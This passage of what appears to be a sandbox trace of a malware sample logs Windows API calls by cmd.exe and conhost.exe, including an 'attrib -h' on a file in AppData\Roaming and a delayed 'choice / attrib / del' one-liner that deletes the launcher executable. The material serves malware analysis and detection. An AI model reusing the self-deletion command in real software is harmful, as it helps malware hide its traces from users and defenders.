(lpRootPathName="C:\\") returned 0x3 [0264.325] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x5ded78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5ded78) returned 0xffffffff [0264.325] GetLastError () returned 0x2 [0264.325] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0264.325] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x5ded78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5ded78) returned 0xffffffff [0264.331] GetLastError () returned 0x2 [0264.331] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0264.331] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x5ded78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5ded78) returned 0x2cb6ef8 [0264.331] FindClose (in: hFindFile=0x2cb6ef8 | out: hFindFile=0x2cb6ef8) returned 1 [0264.331] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x5ded78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5ded78) returned 0xffffffff [0264.331] GetLastError () returned 0x2 [0264.331] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x5ded78, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5ded78) returned 0x2cb70b8 [0264.332] FindClose (in: hFindFile=0x2cb70b8 | out: hFindFile=0x2cb70b8) returned 1 [0264.332] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0264.332] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0264.332] ??_V@YAXPAX@Z () returned 0x1 [0264.332] GetConsoleTitleW (in: lpConsoleTitle=0x5df27c, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0264.442] InitializeProcThreadAttributeList (in: lpAttributeList=0x5df1a8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x5df194 | out: lpAttributeList=0x5df1a8, lpSize=0x5df194) returned 1 [0264.442] UpdateProcThreadAttribute (in: lpAttributeList=0x5df1a8, dwFlags=0x0, Attribute=0x60001, lpValue=0x5df190, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x5df1a8, lpPreviousValue=0x0) returned 1 [0264.442] GetStartupInfoW (in: lpStartupInfo=0x5df1e0 | out: lpStartupInfo=0x5df1e0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0264.442] GetProcessHeap () returned 0x2ca0000 [0264.442] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x18) returned 0x2cb5b28 [0264.442] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0264.442] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0264.442] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0264.442] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0264.442] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0264.442] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0264.442] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0264.442] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0264.443] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0264.443] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0264.443] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0264.443] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0264.443] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0264.443] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0264.443] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0264.443] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0264.443] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0264.443] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0264.443] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0264.443] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0264.443] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0264.443] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0264.443] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0264.443] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0264.443] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0264.443] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0264.443] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0264.443] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0264.443] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0264.443] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0264.443] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0264.443] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0264.443] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0264.444] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0264.444] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0264.444] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0264.444] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0264.444] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0264.444] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0264.444] _wcsnicmp (_String1="COPYCMD", _String2="__COMPA", _MaxCount=0x7) returned 4 [0264.444] GetProcessHeap () returned 0x2ca0000 [0264.444] RtlFreeHeap (HeapHandle=0x2ca0000, Flags=0x0, BaseAddress=0x2cb5b28) returned 1 [0264.444] GetProcessHeap () returned 0x2ca0000 [0264.444] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0xa) returned 0x2cb0f18 [0264.444] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0264.444] _get_osfhandle (_FileHandle=1) returned 0x90 [0264.444] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0264.678] _get_osfhandle (_FileHandle=0) returned 0x8c [0264.678] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1f7) returned 1 [0264.784] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\attrib.exe", lpCommandLine="attrib -h \"C:\\Users\\FD1HVy\\AppData\\Roaming\\Still\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x5df130*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -h \"C:\\Users\\FD1HVy\\AppData\\Roaming\\Still\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x5df17c | out: lpCommandLine="attrib -h \"C:\\Users\\FD1HVy\\AppData\\Roaming\\Still\" ", lpProcessInformation=0x5df17c*(hProcess=0x250, hThread=0x254, dwProcessId=0x85c, dwThreadId=0x56c)) returned 1 [0264.825] CloseHandle (hObject=0x254) returned 1 [0264.825] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0264.825] GetProcessHeap () returned 0x2ca0000 [0264.825] RtlFreeHeap (HeapHandle=0x2ca0000, Flags=0x0, BaseAddress=0x2ccead0) returned 1 [0264.825] GetEnvironmentStringsW () returned 0x2ccead0* [0264.825] GetProcessHeap () returned 0x2ca0000 [0264.825] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0xb88) returned 0x2cb9bd0 [0264.825] FreeEnvironmentStringsA (penv="=") returned 1 [0264.825] WaitForSingleObject (hHandle=0x250, dwMilliseconds=0xffffffff) returned 0x0 [0267.018] GetExitCodeProcess (in: hProcess=0x250, lpExitCode=0x5df114 | out: lpExitCode=0x5df114*=0x0) returned 1 [0267.018] CloseHandle (hObject=0x250) returned 1 [0267.019] _vsnwprintf (in: _Buffer=0x5df1fc, _BufferCount=0x13, _Format="%08X", _ArgList=0x5df11c | out: _Buffer="00000000") returned 8 [0267.019] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0267.019] GetProcessHeap () returned 0x2ca0000 [0267.019] RtlFreeHeap (HeapHandle=0x2ca0000, Flags=0x0, BaseAddress=0x2cb9bd0) returned 1 [0267.019] GetEnvironmentStringsW () returned 0x2ccead0* [0267.019] GetProcessHeap () returned 0x2ca0000 [0267.019] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0xb88) returned 0x2cb9bd0 [0267.019] FreeEnvironmentStringsA (penv="=") returned 1 [0267.019] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0267.019] GetProcessHeap () returned 0x2ca0000 [0267.019] RtlFreeHeap (HeapHandle=0x2ca0000, Flags=0x0, BaseAddress=0x2cb9bd0) returned 1 [0267.019] GetEnvironmentStringsW () returned 0x2ccead0* [0267.019] GetProcessHeap () returned 0x2ca0000 [0267.019] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0xb88) returned 0x2cb9bd0 [0267.019] FreeEnvironmentStringsA (penv="=") returned 1 [0267.019] GetProcessHeap () returned 0x2ca0000 [0267.019] RtlFreeHeap (HeapHandle=0x2ca0000, Flags=0x0, BaseAddress=0x2cb0f18) returned 1 [0267.019] DeleteProcThreadAttributeList (in: lpAttributeList=0x5df1a8 | out: lpAttributeList=0x5df1a8) [0267.019] ??_V@YAXPAX@Z () returned 0x1 [0267.019] GetConsoleTitleW (in: lpConsoleTitle=0x5df708, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0267.057] malloc (_Size=0xffce) returned 0x43c2d58 [0267.057] ??_V@YAXPAX@Z () returned 0x5df494 [0267.057] malloc (_Size=0xffce) returned 0x43d2d30 [0267.057] ??_V@YAXPAX@Z () returned 0x5df24c [0267.058] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0267.058] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0267.058] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0267.058] ??_V@YAXPAX@Z () returned 0x1 [0267.058] GetProcessHeap () returned 0x2ca0000 [0267.058] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0xac) returned 0x2cbd1e0 [0267.058] GetProcessHeap () returned 0x2ca0000 [0267.058] RtlReAllocateHeap (Heap=0x2ca0000, Flags=0x0, Ptr=0x2cbd1e0, Size=0x5a) returned 0x2cbd1e0 [0267.058] GetProcessHeap () returned 0x2ca0000 [0267.058] RtlSizeHeap (HeapHandle=0x2ca0000, Flags=0x0, MemoryPointer=0x2cbd1e0) returned 0x5a [0267.058] GetProcessHeap () returned 0x2ca0000 [0267.058] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x62) returned 0x2cbd248 [0267.058] malloc (_Size=0xffce) returned 0x43d2d30 [0267.058] ??_V@YAXPAX@Z () returned 0x5df1dc [0267.058] GetProcessHeap () returned 0x2ca0000 [0267.058] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0xac) returned 0x2ca0e60 [0267.059] GetProcessHeap () returned 0x2ca0000 [0267.059] RtlReAllocateHeap (Heap=0x2ca0000, Flags=0x0, Ptr=0x2ca0e60, Size=0x5a) returned 0x2ca0e60 [0267.059] GetProcessHeap () returned 0x2ca0000 [0267.059] RtlSizeHeap (HeapHandle=0x2ca0000, Flags=0x0, MemoryPointer=0x2ca0e60) returned 0x5a [0267.059] GetProcessHeap () returned 0x2ca0000 [0267.059] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x54) returned 0x2cb26e0 [0267.059] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x43d2d30 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0267.059] malloc (_Size=0xffd2) returned 0x43e2d08 [0267.059] ??_V@YAXPAX@Z () returned 0x5def94 [0267.063] malloc (_Size=0xffd2) returned 0x43f2ce8 [0267.064] ??_V@YAXPAX@Z () returned 0x5deb1c [0267.064] malloc (_Size=0xffd2) returned 0x4402cc8 [0267.065] ??_V@YAXPAX@Z () returned 0x5deb1c [0267.065] GetProcessHeap () returned 0x2ca0000 [0267.065] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x38) returned 0x2cb73b8 [0267.066] malloc (_Size=0xffce) returned 0x4412ca8 [0267.066] ??_V@YAXPAX@Z () returned 0x5de4b4 [0267.067] malloc (_Size=0xffce) returned 0x4422c80 [0267.067] ??_V@YAXPAX@Z () returned 0x5de4b4 [0267.068] malloc (_Size=0xffce) returned 0x4432c58 [0267.068] ??_V@YAXPAX@Z () returned 0x5de264 [0267.069] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x4432c58 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0267.069] ??_V@YAXPAX@Z () returned 0x1 [0267.069] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x5de4f4, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x4412ca8, nFileSystemNameSize=0x7fe7 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x5de4f4*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0267.072] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0267.072] ??_V@YAXPAX@Z () returned 0x5de4cc [0267.072] ??_V@YAXPAX@Z () returned 0x1 [0267.073] ??_V@YAXPAX@Z () returned 0x1 [0267.074] malloc (_Size=0xffce) returned 0x4412ca8 [0267.075] ??_V@YAXPAX@Z () returned 0x5de8dc [0267.076] GetProcessHeap () returned 0x2ca0000 [0267.076] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x2c) returned 0x2caf8a0 [0267.076] GetProcessHeap () returned 0x2ca0000 [0267.076] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x258) returned 0x2ca0ec8 [0267.076] _wcsicmp (_String1="Still", _String2=".") returned 69 [0267.076] _wcsicmp (_String1="Still", _String2="..") returned 69 [0267.076] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Still" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\still")) returned 0x20 [0267.077] GetProcessHeap () returned 0x2ca0000 [0267.077] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0xffd6) returned 0x2cdf690 [0267.077] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x2cdf698 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0267.077] SetErrorMode (uMode=0x0) returned 0x0 [0267.077] SetErrorMode (uMode=0x1) returned 0x0 [0267.077] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Still", nBufferLength=0x7fe7, lpBuffer=0x4412ca8, lpFilePart=0x5de8fc | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\Still", lpFilePart=0x5de8fc*="Still") returned 0x25 [0267.077] SetErrorMode (uMode=0x0) returned 0x1 [0267.078] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0267.078] GetProcessHeap () returned 0x2ca0000 [0267.078] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x258) returned 0x2ca1128 [0267.078] _wcsicmp (_String1="Still", _String2=".") returned 69 [0267.078] _wcsicmp (_String1="Still", _String2="..") returned 69 [0267.078] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Still" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\still")) returned 0x20 [0267.078] ??_V@YAXPAX@Z () returned 0x1 [0267.078] GetProcessHeap () returned 0x2ca0000 [0267.078] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x14) returned 0x2cb58e8 [0267.078] GetProcessHeap () returned 0x2ca0000 [0267.078] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x48) returned 0x2cb0858 [0267.078] GetProcessHeap () returned 0x2ca0000 [0267.078] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x48) returned 0x2cb0ad8 [0267.078] ??_V@YAXPAX@Z () returned 0x1 [0267.080] ??_V@YAXPAX@Z () returned 0x1 [0267.082] malloc (_Size=0xffd2) returned 0x43f2ce8 [0267.083] ??_V@YAXPAX@Z () returned 0x5dec54 [0267.084] GetProcessHeap () returned 0x2ca0000 [0267.084] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x808) returned 0x2cba760 [0267.084] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Still", fInfoLevelId=0x0, lpFindFileData=0x2cba76c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cba76c) returned 0x2cb7038 [0267.084] malloc (_Size=0xffd2) returned 0x4402cc8 [0267.084] ??_V@YAXPAX@Z () returned 0x5de7e4 [0267.085] malloc (_Size=0xffd2) returned 0x4412ca8 [0267.085] ??_V@YAXPAX@Z () returned 0x5de7e4 [0267.085] RtlDosPathNameToRelativeNtPathName_U_WithStatus () returned 0x0 [0267.085] NtOpenFile (in: FileHandle=0x5de80c, DesiredAccess=0x10000, ObjectAttributes=0x5de7d4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\FD1HVy\\AppData\\Roaming\\Still", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x5de7fc, ShareAccess=0x4, OpenOptions=0x5040 | out: FileHandle=0x5de80c*=0x254, IoStatusBlock=0x5de7fc*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0267.086] RtlReleaseRelativeName () returned 0x5de7ec [0267.086] RtlFreeAnsiString (AnsiString="\\") [0267.086] NtQueryVolumeInformationFile (in: FileHandle=0x254, IoStatusBlock=0x5de738, FsInformation=0x5de740, Length=0x8, FsInformationClass=0x4 | out: IoStatusBlock=0x5de738, FsInformation=0x5de740) returned 0x0 [0267.086] CloseHandle (hObject=0x254) returned 1 [0267.089] ??_V@YAXPAX@Z () returned 0x1 [0267.089] ??_V@YAXPAX@Z () returned 0x1 [0267.090] FindNextFileW (in: hFindFile=0x2cb7038, lpFindFileData=0x2cba76c | out: lpFindFileData=0x2cba76c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7651bfb7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7651bfb7, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7651bfb7, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd018, dwReserved0=0x0, dwReserved1=0x0, cFileName="Still", cAlternateFileName="")) returned 0 [0267.091] GetLastError () returned 0x12 [0267.097] FindClose (in: hFindFile=0x2cb7038 | out: hFindFile=0x2cb7038) returned 1 [0267.097] ??_V@YAXPAX@Z () returned 0x1 [0267.099] GetProcessHeap () returned 0x2ca0000 [0267.099] RtlFreeHeap (HeapHandle=0x2ca0000, Flags=0x0, BaseAddress=0x2cba760) returned 1 [0267.099] GetProcessHeap () returned 0x2ca0000 [0267.099] RtlFreeHeap (HeapHandle=0x2ca0000, Flags=0x0, BaseAddress=0x2cb0ad8) returned 1 [0267.099] GetProcessHeap () returned 0x2ca0000 [0267.099] RtlFreeHeap (HeapHandle=0x2ca0000, Flags=0x0, BaseAddress=0x2cb58e8) returned 1 [0267.099] GetProcessHeap () returned 0x2ca0000 [0267.099] RtlFreeHeap (HeapHandle=0x2ca0000, Flags=0x0, BaseAddress=0x2cb0858) returned 1 [0267.099] ??_V@YAXPAX@Z () returned 0x1 [0267.102] GetProcessHeap () returned 0x2ca0000 [0267.102] RtlFreeHeap (HeapHandle=0x2ca0000, Flags=0x0, BaseAddress=0x2ca1128) returned 1 [0267.102] GetProcessHeap () returned 0x2ca0000 [0267.102] RtlFreeHeap (HeapHandle=0x2ca0000, Flags=0x0, BaseAddress=0x2cdf690) returned 1 [0267.103] GetProcessHeap () returned 0x2ca0000 [0267.103] RtlFreeHeap (HeapHandle=0x2ca0000, Flags=0x0, BaseAddress=0x2ca0ec8) returned 1 [0267.103] GetProcessHeap () returned 0x2ca0000 [0267.103] RtlFreeHeap (HeapHandle=0x2ca0000, Flags=0x0, BaseAddress=0x2caf8a0) returned 1 [0267.104] GetProcessHeap () returned 0x2ca0000 [0267.104] RtlFreeHeap (HeapHandle=0x2ca0000, Flags=0x0, BaseAddress=0x2cb73b8) returned 1 [0267.104] GetProcessHeap () returned 0x2ca0000 [0267.104] RtlFreeHeap (HeapHandle=0x2ca0000, Flags=0x0, BaseAddress=0x2cb26e0) returned 1 [0267.104] GetProcessHeap () returned 0x2ca0000 [0267.104] RtlFreeHeap (HeapHandle=0x2ca0000, Flags=0x0, BaseAddress=0x2ca0e60) returned 1 [0267.104] ??_V@YAXPAX@Z () returned 0x1 [0267.105] ??_V@YAXPAX@Z () returned 0x1 [0267.118] _get_osfhandle (_FileHandle=1) returned 0x90 [0267.118] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0267.186] _get_osfhandle (_FileHandle=1) returned 0x90 [0267.186] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xac3890 | out: lpMode=0xac3890) returned 1 [0267.217] _get_osfhandle (_FileHandle=1) returned 0x90 [0267.217] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0267.256] _get_osfhandle (_FileHandle=0) returned 0x8c [0267.256] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xac3894 | out: lpMode=0xac3894) returned 1 [0267.302] _get_osfhandle (_FileHandle=0) returned 0x8c [0267.302] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0267.312] SetConsoleInputExeNameW () returned 0x1 [0267.312] GetConsoleOutputCP () returned 0x1b5 [0267.322] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xac3850 | out: lpCPInfo=0xac3850) returned 1 [0267.322] SetThreadUILanguage (LangId=0x0) returned 0x6f0409 [0267.327] exit (_Code=0) [0267.328] ??_V@YAXPAX@Z () returned 0x1 Process: id = "41" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1e8d5000" os_pid = "0x1058" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "child_process" parent_id = "39" os_parent_pid = "0x13c4" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 568 os_tid = 0xf0c Thread: id = 570 os_tid = 0x13c8 Thread: id = 572 os_tid = 0x1060 Process: id = "42" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x141e1000" os_pid = "0x118c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "40" os_parent_pid = "0x13d8" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 569 os_tid = 0x13cc Thread: id = 571 os_tid = 0x13c0 Thread: id = 576 os_tid = 0x105c Process: id = "43" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2d19f000" os_pid = "0x1064" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x11c4" cmd_line = "cmd /c choice /t 10 /d y & attrib -h \"C:\\Users\\FD1HVy\\Desktop\\Launchy.exe\" & del \"C:\\Users\\FD1HVy\\Desktop\\Launchy.exe\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 575 os_tid = 0x13e0 [0247.839] GetModuleHandleA (lpModuleName=0x0) returned 0xa90000 [0247.839] __set_app_type (_Type=0x1) [0247.839] __p__fmode () returned 0x776f3c14 [0247.840] __p__commode () returned 0x776f49ec [0247.840] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xaa6fd0) returned 0x0 [0247.840] __getmainargs (in: _Argc=0xabd1a4, _Argv=0xabd1a8, _Env=0xabd1ac, _DoWildCard=0, _StartInfo=0xabd1b8 | out: _Argc=0xabd1a4, _Argv=0xabd1a8, _Env=0xabd1ac) returned 0 [0247.840] _onexit (_Func=0xaa8030) returned 0xaa8030 [0247.840] _onexit (_Func=0xaa8040) returned 0xaa8040 [0247.840] _onexit (_Func=0xaa8050) returned 0xaa8050 [0247.841] _onexit (_Func=0xaa8060) returned 0xaa8060 [0247.841] _onexit (_Func=0xaa8070) returned 0xaa8070 [0247.841] _onexit (_Func=0xaa8080) returned 0xaa8080 [0247.842] GetCurrentThreadId () returned 0x13e0 [0247.842] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x13e0) returned 0x238 [0247.909] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x772d0000 [0247.909] GetProcAddress (hModule=0x772d0000, lpProcName="SetThreadUILanguage") returned 0x772e4f70 [0247.909] SetThreadUILanguage (LangId=0x0) returned 0x2e40409 [0248.031] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0248.031] RegOpenKeyExW (in: hKey=0x80000001, 